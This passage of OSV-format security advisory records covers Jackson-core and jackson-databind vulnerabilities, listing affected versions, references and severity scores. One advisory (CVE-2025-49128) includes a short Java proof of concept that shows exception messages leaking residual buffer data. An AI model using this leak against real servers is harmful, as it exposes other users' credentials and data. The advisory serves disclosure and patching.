"2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.6", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.8.0", 
"2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h46c-h94j-95f3/GHSA-h46c-h94j-95f3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-h46c-h94j-95f3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52999" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-core/pull/943" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-core" } ], "database_specific": { "cwe_ids": [ "CWE-121" ], "github_reviewed": true, "github_reviewed_at": "2025-06-27T15:22:22Z", "nvd_published_at": "2025-06-25T17:15:39Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wf8f-6423-gfxg", "published": "2025-06-07T00:10:42Z", "modified": "2025-06-07T00:54:46.814569Z", "aliases": [ "CVE-2025-49128" ], "related": [ "CGA-679q-pc95-xgm4", "CGA-w99f-h8p7-76rg", "CVE-2025-49128" ], "summary": "Jackson-core Vulnerable to Memory Disclosure via Source Snippet in JsonLocation", "details": "### Overview\n\nA flaw in Jackson-core's `JsonLocation._appendSourceDesc` method allows up to 500 bytes of unintended memory content to be included in exception messages. When parsing JSON from a byte array with an offset and length, the exception message incorrectly reads from the beginning of the array instead of the logical payload start. 
This results in possible **information disclosure** in systems using **pooled or reused buffers**, like Netty or Vert.x.\n\n### Details\n\nThe vulnerability affects the creation of exception messages like:\n\n```\nJsonParseException: Unexpected character ... at [Source: (byte[])...]\n```\n\nWhen `JsonFactory.createParser(byte[] data, int offset, int len)` is used, and an error occurs while parsing, the exception message should include a snippet from the specified logical payload. However, the method `_appendSourceDesc` ignores the `offset`, and always starts reading from index `0`.\n\nIf the buffer contains residual sensitive data from a previous request, such as credentials or document contents, that data may be exposed if the exception is propagated to the client.\n\nThe issue particularly impacts server applications using:\n\n* Pooled byte buffers (e.g., Netty)\n* Frameworks that surface parse errors in HTTP responses\n* Default Jackson settings (i.e., `INCLUDE_SOURCE_IN_LOCATION` is enabled)\n\nA documented real-world example is [CVE-2021-22145](https://nvd.nist.gov/vuln/detail/CVE-2021-22145) in Elasticsearch, which stemmed from the same root cause.\n\n### Attack Scenario\n\nAn attacker sends malformed JSON to a service using Jackson and pooled byte buffers (e.g., Netty-based HTTP servers). 
If the server reuses a buffer and includes the parser’s exception in its HTTP 400 response, the attacker may receive residual data from previous requests.\n\n### Proof of Concept\n\n```java\nbyte[] buffer = new byte[1000];\nSystem.arraycopy(\"SECRET\".getBytes(), 0, buffer, 0, 6);\nSystem.arraycopy(\"{ \\\"bad\\\": }\".getBytes(), 0, buffer, 700, 10);\n\nJsonFactory factory = new JsonFactory();\nJsonParser parser = factory.createParser(buffer, 700, 20);\nparser.nextToken(); // throws exception\n\n// Exception message will include \"SECRET\"\n```\n\n### Patches\nThis issue was silently fixed in jackson-core version 2.13.0, released on September 30, 2021, via [PR #652](https://github.com/FasterXML/jackson-core/pull/652).\n\nAll users should upgrade to version 2.13.0 or later.\n\n### Workarounds\nIf upgrading is not immediately possible, applications can mitigate the issue by:\n\n1. **Disabling exception message exposure to clients** — avoid returning parsing exception messages in HTTP responses.\n2. 
**Disabling source inclusion in exceptions** by setting:\n\n ```java\n jsonFactory.disable(JsonFactory.Feature.INCLUDE_SOURCE_IN_LOCATION);\n ```\n\n This prevents Jackson from embedding any source content in exception messages, avoiding leakage.\n\n\n### References\n* [Pull Request #652 (Fix implementation)](https://github.com/FasterXML/jackson-core/pull/652)\n* [CVE-2021-22145 (Elasticsearch exposure of this flaw)](https://nvd.nist.gov/vuln/detail/CVE-2021-22145)", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-core", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.13.0" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.7", "2.13.0-rc1", "2.13.0-rc2", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.6", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", 
"2.9.8", "2.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wf8f-6423-gfxg/GHSA-wf8f-6423-gfxg.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-wf8f-6423-gfxg" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22145" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49128" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-core/pull/652" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-core/commit/a6c297682737dde13337cb7c3020f299518609a8" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-core" } ], "database_specific": { "cwe_ids": [ "CWE-209" ], "github_reviewed": true, "github_reviewed_at": "2025-06-07T00:10:42Z", "nvd_published_at": "2025-06-06T22:15:23Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-27xj-rqx5-2255", "published": "2020-05-15T18:58:44Z", "modified": "2024-02-16T08:06:12.878312Z", "aliases": [ "CVE-2020-11619" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", 
"2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-27xj-rqx5-2255/GHSA-27xj-rqx5-2255.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11619" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2680" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200511-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:32:22Z", "nvd_published_at": "2020-04-07T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-288c-cq4h-88gq", "published": "2021-02-18T20:51:54Z", "modified": "2024-10-22T05:28:57.400652Z", "aliases": [ "CGA-jp8x-p2pf-pcp2", "CVE-2020-25649" ], "summary": "XML External Entity (XXE) Injection in Jackson Databind", "details": "A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. 
This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.6.0" }, { "fixed": "2.6.7.4" } ] } ], "versions": [ "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-288c-cq4h-88gq/GHSA-288c-cq4h-88gq.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0.0" }, { "fixed": "2.9.10.7" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.6", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-288c-cq4h-88gq/GHSA-288c-cq4h-88gq.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", 
"ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.10.0.0" }, { "fixed": "2.10.5.1" } ] } ], "versions": [ "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.10.5.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-288c-cq4h-88gq/GHSA-288c-cq4h-88gq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25649" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2589" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3d932709abd0b5390efe67451653fc9efa9db677" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc82ff47853289e9cd17f5cfbb053c04cafc75ee32e3d7223963f83bb@%3Cdev.knox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc15e90bbef196a5c6c01659e015249d6c9a73581ca9afb8aeecf00d2@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb674520b9f6c808c1bf263b1369e14048ec3243615f35cfd24e33604@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raf13235de6df1d47a717199e1ecd700dff3236632f5c9a1488d9845b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/ra95faf968f3463acb3f31a6fbec31453fc5045325f99f396961886d3@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra409f798a1e5a6652b7097429b388650ccd65fd958cee0b6f69bba00@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1157e57a01d25e36b0dc17959ace758fc21ba36746de29ba1d8b130@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r98bfe3b90ea9408f12c4b447edcb5638703d80bc782430aa0c210a54@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r95a297eb5fd1f2d3a2281f15340e2413f952e9d5503296c3adc7201a@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r94c7e86e546120f157264ba5ba61fd29b3a8d530ed325a9b4fa334d7@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r91722ecfba688b0c565675f8bf380269fde8ec62b54d6161db544c22@%3Ccommits.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90d1e97b0a743cf697d89a792a9b669909cc5a1692d1e0083a22e66c@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r900d4408c4189b376d1ec580ea7740ea6f8710dc2f0b7e9c9eeb5ae0@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8ae961c80930e2717c75025414ce48a432cea1137c02f648b1fb9524@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210108-0007" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6X2UT4X6M7DLQYBOOHMXBWGYJ65RL2CT" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1809a1374041a969d77afab21fc38925de066bc97e86157d3ac3402@%3Ccommits.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re96dc7a13e13e56190a5d80f9e5440a0d0c83aeec6467b562fbf2dca@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re16f81d3ad49a93dd2f0cba9f8fc88e5fb89f30bf9a2ad7b6f3e69c1@%3Ccommits.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf9a34726482222c90d50ae1b9847881de67dde8cfde4999633d2cdc@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdca8711bb7aa5d47a44682606cd0ea3497e2e922f22b7ee83e81e6c1@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd6f6bf848c2d47fa4a85c27d011d948778b8f7e58ba495968435a0b3@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd57c7582adc90e233f23f3727db3df9115b27a823b92374f11453f34@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd317f15a675d114dbf5b488d27eeb2467b4424356b16116eb18a652d@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc959cdb57c4fe198316130ff4a5ecbf9d680e356032ff2e9f4f05d54@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc88f2fa2b7bd6443921727aeee7704a1fb02433e722e2abf677e0d3d@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r5f8a1608d758936bd6bbc5eed980777437b611537bf6fff40663fc71@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b130fe668503c4b7e2caf1b16f86b7f2070fd1b7ef8f26195a2ffbd@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r45e7350dfc92bb192f3f88e9971c11ab2be0953cc375be3dda5170bd@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r407538adec3185dd35a05c9a26ae2f74425b15132470cf540f41d85b@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3e6ae311842de4e64c5d560a475b7f9cc7e0a9a8649363c6cf7537eb@%3Ccommits.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31f4ee7d561d56a0c2c2c6eb1d6ce3e05917ff9654fdbfec05dc2b83@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f5c5479f99398ef344b7ebd4d90bc3316236c45d0f3bc42090efcd7@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2eb66c182853c69ecfb52f63d3dec09495e9b65be829fd889a081ae1@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2b6ddb3a4f4cd11d8f6305011e1b7438ba813511f2e3ab3180c7ffda@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2882fc1f3032cd7be66e28787f04ec6f1874ac68d47e310e30ff7eb1@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b7ed0c4b6c4301d4dfd6fdbc5581b0a789d3240cab55d766f33c6c6@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0b8dc3acd4503e4ecb6fbd6ea7d95f59941168d8452ac0ab1d1d96bb@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0881e23bd9034c8f51fdccdc8f4d085ba985dcd738f8520569ca5c3d@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/r04529cedaca40c2ff90af4880493f9c88a8ebf4d1d6c861d23108a5a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r024b7bda9c43c5560d81238748775c5ecfe01b57280f90df1f773949@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r011d1430e8f40dff9550c3bc5d0f48b14c01ba8aecabd91d5e495386@%3Ccommits.turbine.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8764bb835bcb8e311c882ff91dd3949c9824e905e880930be56f6ba3@%3Cuser.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r86c78bf7656fdb2dab69cbf17f3d7492300f771025f1a3a65d5e5ce5@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7cb5b4b3e4bd41a8042e5725b7285877a17bcbf07f4eb3f7b316af60@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r78d53a0a269c18394daf5940105dc8c7f9a2399503c2e78be20abe7e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r765283e145049df9b8998f14dcd444345555aae02b1610cfb3188bf8@%3Cnotifications.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r73bef1bb601a9f093f915f8075eb49fcca51efade57b817afd5def07@%3Ccommits.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e3d4f7991542119a4ca6330271d7fbf7b9fb3abab24ada82ddf1ee4@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r6cbd599b80e787f02ff7a1391d9278a03f37d6a6f4f943f0f01a62fb@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a6df5647583541e3cb71c75141008802f7025cee1c430d4ed78f4cc@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a4f3ef6edfed2e0884269d84798f766779bbbc1005f7884e0800d61@%3Cdev.knox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68d029ee74ab0f3b0569d0c05f5688cb45dd3abe96a6534735252805@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r63c87aab97155f3f3cbe11d030c4a184ea0de440ee714977db02e956@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r605764e05e201db33b3e9c2e66ff620658f07ad74f296abe483f7042@%3Creviews.iotdb.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2021-02-18T20:41:26Z", "nvd_published_at": "2020-12-03T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3x8x-79m2-3w2w", "published": "2023-03-19T00:30:25Z", "modified": "2025-02-26T22:33:28.884683Z", "aliases": [ "CGA-fgh7-phh7-cj6x", "CVE-2021-46877" ], 
"related": [ "CGA-rxrj-cf2v-c7cp", "CGA-v95v-8w2m-8jvx", "CGA-xhwm-c67m-hhvv" ], "summary": "jackson-databind possible Denial of Service if using JDK serialization to serialize JsonNode", "details": "jackson-databind 2.10.x through 2.12.x before 2.12.6 and 2.13.x before 2.13.1 allows attackers to cause a denial of service (2 GB transient heap usage per read) in uncommon situations involving JsonNode JDK serialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.10.0" }, { "fixed": "2.12.6" } ] } ], "versions": [ "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.5.1", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-3x8x-79m2-3w2w/GHSA-3x8x-79m2-3w2w.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.13.0" }, { "fixed": "2.13.1" } ] } ], "versions": [ "2.13.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-3x8x-79m2-3w2w/GHSA-3x8x-79m2-3w2w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46877" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3328" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3ccde7d938fea547e598fdefe9a82cff37fed5cb" }, { "type": "PACKAGE", "url": 
